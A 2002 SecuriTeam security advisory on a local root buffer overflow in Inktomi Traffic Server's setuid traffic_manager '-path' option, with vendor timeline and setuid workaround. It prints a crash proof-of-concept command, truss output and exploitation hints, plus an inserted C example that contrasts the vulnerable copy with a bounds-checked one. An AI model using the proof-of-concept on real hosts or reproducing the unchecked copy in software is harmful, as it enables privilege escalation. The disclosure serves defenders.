[NT] Vulnerability Report for Inktomi Traffic Server

From: support@securiteam.com
To: list@securiteam.com
Date: Wed,  3 Jul 2002 08:06:43 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Vulnerability Report for Inktomi Traffic Server
------------------------------------------------------------------------

SUMMARY

Inktomi's Traffic Server product provides transparent web caching, access
control and content filtering. It is available for Linux, Solaris and
Windows platforms. A vulnerability that could allow a local attacker to
gain root access has been discovered in the UNIX version of the software.

DETAILS

Vulnerable Packages/Systems:
The local root vulnerability in traffic_manager exists in all current and
previous revisions of Inktomi Traffic Server, Traffic Edge, and Media-IXT.

Current product revisions are:
 * Media-IXT 3.0.4
 * Traffic Server / Media-IXT 4.0.18
 * Traffic Server / Media-IXT 4.0.20
 * Traffic Server / Media-IXT 5.1.3
 * Traffic Server / Media-IXT 5.2.0-R
 * Traffic Server / Media-IXT 5.2.1
 * Traffic Server / Media-IXT 5.2.2
 * Traffic Edge 1.1.2 (Traffic Server 5.2.1)
 * Traffic Edge 1.5.0 (Traffic Server 5.5)

Buffer overflow in traffic_manager executable
The traffic_manager executable is used to manage Traffic Server; it is
installed setuid-root by default under the [installpath]/bin directory.
When traffic_manager is executed with an over-long -path argument, a
stack buffer overflow occurs. This vulnerability can be exploited locally
to gain root access.

Vendors contacted:
Inktomi Corporation (INKT)
 * Initial email sent: 2002-06-21
 * Acknowledged reception of initial contact: 2002-06-24
 * Official response and fix information: 2002-07-01

Solution/Vendor Information/Workaround:
The buffer overflow error in the "-path" option of the traffic_manager
command will be corrected to remove the vulnerability in all future
maintenance releases of Traffic Server, Media-IXT and Traffic Edge.

The identified vulnerability applies to command-line execution of
bin/traffic_manager, so the risk applies only to shell sessions already
connected to the proxy host as non-privileged users. The vulnerability
does not affect network services or access and cannot grant remote access
to the proxy host.

If you wish to block this local vulnerability, remove the setuid bit from
the traffic_manager executable. When traffic_manager is not setuid root,
the proxy will not be able to directly serve 'privileged' port numbers
less than 1024.

Some proxy configurations will require ARM config/ipnat.conf

Please refer to Inktomi's note on the bug at:
http://support.inktomi.com/kb/070202-003.html
It gives specific instructions on how to reconfigure the products to
operate properly without the SUID flag set on the binary.

Contact emailsupport@inktomi.com for assistance.

Technical Description - Exploit/Concept Code:
The Traffic Server installer (install.sh) installs the traffic_manager
program as a root-owned file with the setuid bit set.

Below are the lines from install.sh that make traffic_manager
setuid-root.

  # Adjust setuid commands
  chown root ${InstallDir}/bin/traffic_manager >>$LogFile 2>&1
  chmod 4755 ${InstallDir}/bin/traffic_manager >>$LogFile 2>&1
  if [ -d ${InstallDir}/bin/debug ] ; then
    chown root ${InstallDir}/bin/debug/traffic_manager >>$LogFile 2>&1
    chmod 4755 ${InstallDir}/bin/debug/traffic_manager >>$LogFile 2>&1
  fi

The overflow occurs when a string longer than 1700 bytes is passed as
the argument to the -path option. Exploitability has been confirmed on
Solaris.

/inktomi/5.1.3/bin# ./traffic_manager -path `perl -e 'print "A"x1720'` <
[TrafficManager] ==> Kernel Sig 11; Reason: 1
[TrafficManager] ==> Cleaning up and reissuing signal #11
Abort(coredump)

truss output:
open64("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA", O_RDONLY) Err#78 ENAMETOOLONG
fstat(3, 0xFFBEC130) = 0
time() = 1024660377
getpid() = 27458 [27457]
putmsg(3, 0xFFBEB7E8, 0xFFBEB7DC, 0) = 0
open("/var/run/syslog_door", O_RDONLY) Err#2 ENOENT
    Incurred fault #5, FLTACCESS %pc = 0xFF0CF2E0
      siginfo: SIGBUS BUS_ADRALN addr=0x41414149
    Received signal #10, SIGBUS [caught]
      siginfo: SIGBUS BUS_ADRALN addr=0x41414149

Replacing 0x41414141 with a valid stack address and building the right
string, it is possible to execute arbitrary code with root privileges.
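The bug class described above, modelled in C as an added example that is not Inktomi's code: an unbounded copy of the -path value into a fixed 1700-byte stack buffer, beside a version that rejects the argument before copying anything. The buffer size (taken from the 1700-byte threshold reported above), the function names, the option scan and the constructed argument of 'A's are assumptions for illustration; the real traffic_manager source is not on the page, and nothing here reproduces its frame layout or the SPARC alignment fault shown in the truss output.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Assumed size: the advisory reports the overflow at >1700 bytes. */
#define PATH_BUF 1700

/* Vulnerable pattern (modelled, not Inktomi's code): the option value is
 * copied into a fixed stack buffer with no length check, so 1720 'A's run
 * past the buffer into saved frame data. The kernel later rejecting the
 * name with ENAMETOOLONG (as in the truss output) does not undo that: the
 * corruption already happened in strcpy. Only call with short input. */
static int open_path_vuln(const char *arg)
{
    char buf[PATH_BUF];
    int fd;

    strcpy(buf, arg);                  /* BUG: unbounded copy */
    fd = open(buf, O_RDONLY);
    if (fd < 0)
        return -errno;
    close(fd);
    return 0;
}

/* 1 when arg plus its NUL fits in PATH_BUF. strnlen stops at PATH_BUF,
 * so an enormous argv string is never scanned further than needed. */
static int path_arg_fits(const char *arg)
{
    return strnlen(arg, PATH_BUF) < PATH_BUF;
}

/* Hardened form: validate first, then copy exactly the bytes that fit. */
static int open_path_safe(const char *arg)
{
    char buf[PATH_BUF];
    int fd;

    if (!path_arg_fits(arg))
        return -ENAMETOOLONG;          /* rejected before any copy */
    memcpy(buf, arg, strlen(arg) + 1);
    fd = open(buf, O_RDONLY);
    if (fd < 0)
        return -errno;
    close(fd);
    return 0;
}

/* Minimal scan for "-path <value>" (assumed shape of the option handling).
 * Returns -EINVAL when the option or its value is missing. */
static int run_cli(int argc, char **argv)
{
    int i;
    for (i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-path") == 0) {
            if (i + 1 >= argc)
                return -EINVAL;
            return open_path_safe(argv[i + 1]);
        }
    }
    return -EINVAL;
}

/* Constructed input: len 'A's, like perl -e 'print "A"x1720'. Caller frees. */
static char *make_arg(size_t len)
{
    char *s = malloc(len + 1);
    if (!s)
        return NULL;
    memset(s, 'A', len);
    s[len] = '\0';
    return s;
}

/* Build an argument of the given length, run the check, free it. */
static int arg_fits_len(size_t len)
{
    char *s = make_arg(len);
    int ok = s ? path_arg_fits(s) : 0;
    free(s);
    return ok;
}

/* Same, but through the argv scan: "traffic_manager -path AAAA...". */
static int cli_with_path_len(size_t len)
{
    char *s = make_arg(len);
    char *argv[] = { "traffic_manager", "-path", s };
    int rc = s ? run_cli(3, argv) : -ENOMEM;
    free(s);
    return rc;
}

int main(void)
{
    printf("1699 bytes fit: %d\n", arg_fits_len(1699));
    printf("1720 bytes -> rc %d (ENAMETOOLONG is %d)\n",
           cli_with_path_len(1720), -ENAMETOOLONG);
    printf("/dev/null -> rc %d\n", open_path_safe("/dev/null"));
    return 0;
}
```

The point of the hardened version is the order of operations: the length is checked against the destination buffer, not left for open() to complain about, because by the time the kernel returns ENAMETOOLONG the copy has already overwritten the stack. Removing the setuid bit, as the vendor workaround suggests, limits what such a crash is worth, but does not remove the overflow itself.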

ADDITIONAL INFORMATION

The information has been provided by Iván Arce
(core.lists.bugtraq@core-sdi.com).

========================================

This bulletin is sent to members of the SecuriTeam mailing list.